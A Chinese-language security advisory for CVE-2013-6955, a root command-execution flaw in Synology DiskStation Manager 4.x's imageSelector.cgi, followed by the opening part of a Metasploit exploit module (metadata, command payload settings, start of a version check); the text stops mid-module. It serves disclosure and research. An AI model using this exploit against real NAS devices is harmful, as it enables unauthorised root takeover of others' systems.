Synology DiskStation Manager 'imageSelector.cgi'远程命令执

发布日期：2013-12-25
更新日期：2013-12-26

受影响系统：
Synology DiskStation Manager 4.x
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 64516
CVE(CAN) ID: CVE-2013-6955

Synology DiskStation Manager是可以提供多任务用户接口的NAS操作系统。

Synology DiskStation Manager 4.x版本的/webman/imageSelector.cgi允许附加任意数据到使用 SLICEUPLOAD 功能的文件，在实现上存在安全漏洞，未经身份验证的用户通过发送特制的HTTP请求，利用此漏洞可以root权限执行任意命令。

<*来源：Markus Wulftange
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
                        &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x

def initialize(info={})
    super(update_info(info,
      'Name'          => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
        versions 4.x, which allows the execution of arbitrary commands under root
        privileges.
        The vulnerability is located in /webman/imageSelector.cgi, which allows to append
        arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
        can be triggered by an unauthenticated user with a specially crafted HTTP request.
        This is exploited by this module to append the given commands to /redirect.cgi,
        which is a regular shell script file, and can be invoked with another HTTP request.
        Synology reported that the vulnerability has been fixed with versions 4.0-2259,
        4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
      },
      'Author'        =>
        [
          'Markus Wulftange' # Discovery, Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2013-6955' ],
        ],
      'Privileged'    => false,
      'Platform'      => ['unix'],
      'Arch'          => ARCH_CMD,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'      => 0x31337,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'DefaultTarget'  => 0,
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Oct 31 2013'
    ))

register_options(
      [
        Opt::RPORT(5000)
      ], self.class)
  end

def check
    print_status("#{peer} - Trying to detect installed version")

res = send_request_cgi({
      'method'  => 'GET',
      'uri'      => normalize_uri('webman', 'info.cgi'),
      'vars_get' => { 'host' => ''}
    })